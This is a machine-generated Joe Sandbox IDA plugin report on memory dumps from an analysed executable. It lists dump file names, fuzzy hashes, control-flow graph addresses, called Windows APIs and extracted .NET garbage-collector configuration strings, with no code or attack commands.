• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 079e50680ba0851a1e5311ed09f4e745be475b330cea89eadfc2402106436220
• Instruction ID: 8ef09f34ca1c0e3eac18cc3cc1c622dfca95829e4bccfc91c721212fdaf5c987
• Opcode Fuzzy Hash: 079e50680ba0851a1e5311ed09f4e745be475b330cea89eadfc2402106436220
• Instruction Fuzzy Hash: 48319AA3D0C66680FA629B71E8013F92390FF16340F490432DA6E82391DE7FE549B31C
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 296 7ff6385dea40-7ff6385dea6d 297 7ff6385dea6f 296->297 298 7ff6385dea76-7ff6385dea7e 297->298 299 7ff6385dea80-7ff6385dea8a call 7ff638602510 298->299 300 7ff6385dea8c-7ff6385deaac 298->300 299->297 302 7ff6385deba3-7ff6385deba9 300->302 303 7ff6385deab2-7ff6385deab8 300->303 307 7ff6385debab-7ff6385debb1 call 7ff6385e6680 302->307 308 7ff6385debb6-7ff6385debb9 302->308 305 7ff6385deabe 303->305 306 7ff6385deb8d-7ff6385deb98 303->306 310 7ff6385deac0-7ff6385deac6 305->310 306->303 309 7ff6385deb9e 306->309 307->308 312 7ff6385debbf-7ff6385debc6 308->312 313 7ff6385dec7a-7ff6385dec84 call 7ff6385f6d90 308->313 309->302 315 7ff6385deb32-7ff6385deb42 call 7ff6385cace0 310->315 316 7ff6385deac8-7ff6385dead0 310->316 317 7ff6385dec71-7ff6385dec78 312->317 318 7ff6385debcc-7ff6385debd4 312->318 326 7ff6385decec-7ff6385decef 313->326 327 7ff6385dec86-7ff6385dec8c 313->327 337 7ff6385deb44-7ff6385deb4b 315->337 338 7ff6385deb66-7ff6385deb6e 315->338 316->315 323 7ff6385dead2-7ff6385dead9 316->323 317->313 320 7ff6385dec22-7ff6385dec36 call 7ff6385df2a0 317->320 318->317 319 7ff6385debda-7ff6385dec04 318->319 319->317 324 7ff6385dec06-7ff6385dec1d call 7ff6386003e0 319->324 332 7ff6385dec3b-7ff6385dec45 320->332 329 7ff6385deadb-7ff6385deae8 323->329 330 7ff6385deb29-7ff6385deb30 SwitchToThread 323->330 324->320 326->320 334 7ff6385decf5-7ff6385ded0d call 7ff6385ded20 326->334 335 7ff6385dec8e-7ff6385dec91 327->335 336 7ff6385dec9d-7ff6385decad call 7ff638602350 327->336 339 7ff6385deaea 329->339 340 7ff6385deb08-7ff6385deb0c 329->340 333 7ff6385deb83-7ff6385deb87 330->333 332->298 346 7ff6385dec4b-7ff6385dec70 332->346 333->306 333->310 334->332 335->336 348 7ff6385dec93-7ff6385dec98 call 7ff6385e6680 335->348 360 7ff6385decaf-7ff6385decb9 call 7ff6385f6d90 336->360 361 7ff6385decbb-7ff6385decc1 336->361 349 7ff6385deb4d-7ff6385deb53 337->349 350 7ff6385deb5c-7ff6385deb61 call 7ff6385d4930 337->350 343 7ff6385deb70-7ff6385deb75 call 7ff638602510 338->343 344 7ff6385deb7a-7ff6385deb7c 338->344 342 7ff6385deaf0-7ff6385deaf4 339->342 340->333 345 7ff6385deb0e-7ff6385deb16 340->345 342->340 353 7ff6385deaf6-7ff6385deafe 342->353 343->344 344->333 355 7ff6385deb7e call 7ff6385cac80 344->355 345->333 356 7ff6385deb18-7ff6385deb27 call 7ff6385cace0 SwitchToThread 345->356 348->336 349->350 359 7ff6385deb55-7ff6385deb5a SwitchToThread 349->359 350->338 353->340 362 7ff6385deb00-7ff6385deb06 353->362 355->333 356->344 359->338 360->326 360->361 366 7ff6385decc3-7ff6385decc6 361->366 367 7ff6385deccc-7ff6385dece7 call 7ff6386003e0 361->367 362->340 362->342 366->320 366->367 367->326
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF6385D7258,?,?,0000000A,00007FF6385D6290,?,?,00000000,00007FF6385CD511), ref: 00007FF6385D49A7
• GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF6385D7258,?,?,0000000A,00007FF6385D6290,?,?,00000000,00007FF6385CD511), ref: 00007FF6385D49C7
• VirtualAllocExNuma.KERNEL32 ref: 00007FF6385D49E8
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: AllocVirtual$CurrentNumaProcess
• String ID:
• API String ID: 647533253-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
• String ID:
• API String ID: 205171174-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: BreakDebug
• String ID:
• API String ID: 456121617-0
• Opcode ID: 0ea7ae459f610f3fad0c70b7da49c45737172eb66abf2fe226c336cc78108b37
• Instruction ID: 6db1c418039ca80a235171252ea952e79968522b46dddac9a4bb8fb0106dafbd
• Opcode Fuzzy Hash: 0ea7ae459f610f3fad0c70b7da49c45737172eb66abf2fe226c336cc78108b37
• Instruction Fuzzy Hash: DF419163F0968282FA908B3194415F52395EF95BB4F440232DE6EA37C9DF3EE545E704
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF6386C4FCE), ref: 00007FF6386C50C2
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: d97dfab9c5e2ca5e289d41580aff86dd4a5f9488f693484709a33908da07a3c5
• Instruction ID: 311cd7f5218466dbd054715fbc0e1f6a2f92b433e7cfa43e3ec1b7b6845a13ef
• Opcode Fuzzy Hash: d97dfab9c5e2ca5e289d41580aff86dd4a5f9488f693484709a33908da07a3c5
• Instruction Fuzzy Hash: 2621D323F0C16199FB50E6719C255FD22B06F917A4F640136ED4DD7B87CE2EA983B288
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: EventRegister
• String ID:
• API String ID: 3840811365-0
• Opcode ID: 5002b474bb04ea49417c636b9c7ede251b2549fc1c56c93d51276f5579b127f3
• Instruction ID: e5a60f69cbad685dd49264fcfd4a8e6d799877084b32110550833568a57b9109
• Opcode Fuzzy Hash: 5002b474bb04ea49417c636b9c7ede251b2549fc1c56c93d51276f5579b127f3
• Instruction Fuzzy Hash: FF21C362E08A8791EB60AB31E8419F433A2EF04754F409177C80DD6362DF3FA589EB48
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
• Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
• String ID:
• API String ID: 2131581837-0
• Opcode ID: 75531f9ef1e05551313e84bc67e7be72a58d736af8ca60721ca344a7d4dec63b
• Instruction ID: acd18552eb17ff4b9aa354b50521350b5191a03479b3ef3da31a532708ee6d74
• Opcode Fuzzy Hash: 75531f9ef1e05551313e84bc67e7be72a58d736af8ca60721ca344a7d4dec63b
• Instruction Fuzzy Hash: 8B01AD33B0874292EB48EB71B9052E9B3A1FB06780F004039EB5D87746CF7DE424AB08
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCWriteBarrier$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
• API String ID: 0-2278931206
• Opcode ID: 7d9e740062ad0d414f9252967952863cffa33398030164f4c9e074f188c9779b
• Instruction ID: 621fe3065b7e1296d98796d424706541ea22c3795814742f6c1e9132009373c3
• Opcode Fuzzy Hash: 7d9e740062ad0d414f9252967952863cffa33398030164f4c9e074f188c9779b
• Instruction Fuzzy Hash: 5E325C62A08B9682EB209B25F810AE967A1FF557CCF416132DD8D47F24DF3ED2069748
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID:
• String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
• API String ID: 0-2894337444
• Opcode ID: d5899f85e7324bffdf75d1a60207a93c99c8708487a97b5eae93eb359406f58a
• Instruction ID: ecc756da6df8fe14d59a35a5cecde0973db3ef4f63c986d14fb3c03d6e76a6bf
• Opcode Fuzzy Hash: d5899f85e7324bffdf75d1a60207a93c99c8708487a97b5eae93eb359406f58a
• Instruction Fuzzy Hash: 61F1E957D28A87A1F705EB74EC501F13376AF94318FC45133D80EC62A29E3EA64AE749
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
• String ID: SeLockMemoryPrivilege
• API String ID: 1752251271-475654710
• Opcode ID: 275778b2c87945346c343b7060d433ef645a75266afabc79b075121605c67c8d
• Instruction ID: 2f562e1670652d1aff5fe033b1d5f6034b3d9794f48ef89f0142c8c3244c3b3b
• Opcode Fuzzy Hash: 275778b2c87945346c343b7060d433ef645a75266afabc79b075121605c67c8d
• Instruction Fuzzy Hash: F831B623A1C64286FB609B71E8553AAA7A1EF54795F004035DD4E83754DF3EE548D704
Uniqueness
Uniqueness Score: -1.00%

APIs
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA05C
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA198
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA276
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA28C
• RaiseFailFastException.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000019,00000000,00000000,00007FF6386C99E0,00007FF6386ECC41), ref: 00007FF6385CA2CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: ExceptionFailFastRaise
• String ID: [ KeepUnwinding ]
• API String ID: 2546344036-400895726
• Opcode ID: 14f8151ae2a9b00e55a37d6bfd4d89bac21379c7a9a794f679ba3dd1bac369d4
• Instruction ID: daad0ac105a678160999b3b6b0706c551ddbf814bc12d920665c224f8ee7ff24
• Opcode Fuzzy Hash: 14f8151ae2a9b00e55a37d6bfd4d89bac21379c7a9a794f679ba3dd1bac369d4
• Instruction Fuzzy Hash: 69A17373A09B4181EB958F35D4402E937B1FB44FA8F244136CA4D8779ADF3AD485E714
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F029B
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F02DD
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0308
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0329
• FlushProcessWriteBuffers.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,07FFF001,00000000,00000000), ref: 00007FF6385F0597
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$BuffersFlushProcessWrite
• String ID:
• API String ID: 2950773196-0
• Opcode ID: 28e8806297d9716eb0f9ab73adbd07b2b27ead853266ea04d2401ea6defbfe2d
• Instruction ID: 23f93651439571eb7c2cc77da5752c06a320b817732c3b73311ddbd925f0e72b
• Opcode Fuzzy Hash: 28e8806297d9716eb0f9ab73adbd07b2b27ead853266ea04d2401ea6defbfe2d
• Instruction Fuzzy Hash: 5BE18B63B09686C2EAA09B35E8403F963A1FF54B94F484532D95CC7795DF3EE588E308
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 170a2accd421f9800a2ca1e9465c53bf2d32f5c259a91f73e09212cd5c2c4438
• Instruction ID: b3d27ad5e3752cc488ee32da7ad3e07f543428a9e6b1abde4e8c4fc7c86c846e
• Opcode Fuzzy Hash: 170a2accd421f9800a2ca1e9465c53bf2d32f5c259a91f73e09212cd5c2c4438
• Instruction Fuzzy Hash: CE115A36B64F028AEB00CFB0E8552B833B4FB59758F440E31DA6D867A4DF38E5989340
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
Similarity
• API ID: BreakDebug$CounterPerformanceQuery
• String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT
• API String ID: 3366438525-1582306835
• Opcode ID: 328b25f9c2722ec70dc2ca1b2558c801ce1e0314ddb5f8d67d303e2d1c2caafc
• Instruction ID: 34f4d324646eb9500f809a07d8ff5d8cc0092ca9fc8c011f49b90e76ae051e4f
• Opcode Fuzzy Hash: 328b25f9c2722ec70dc2ca1b2558c801ce1e0314ddb5f8d67d303e2d1c2caafc
• Instruction Fuzzy Hash: 0A32C223A09B4281EB918B35E8402F9A3A1BF457A5F046236D95ED77E5DF3EF444E308
Uniqueness

Uniqueness Score: -1.00%

APIs
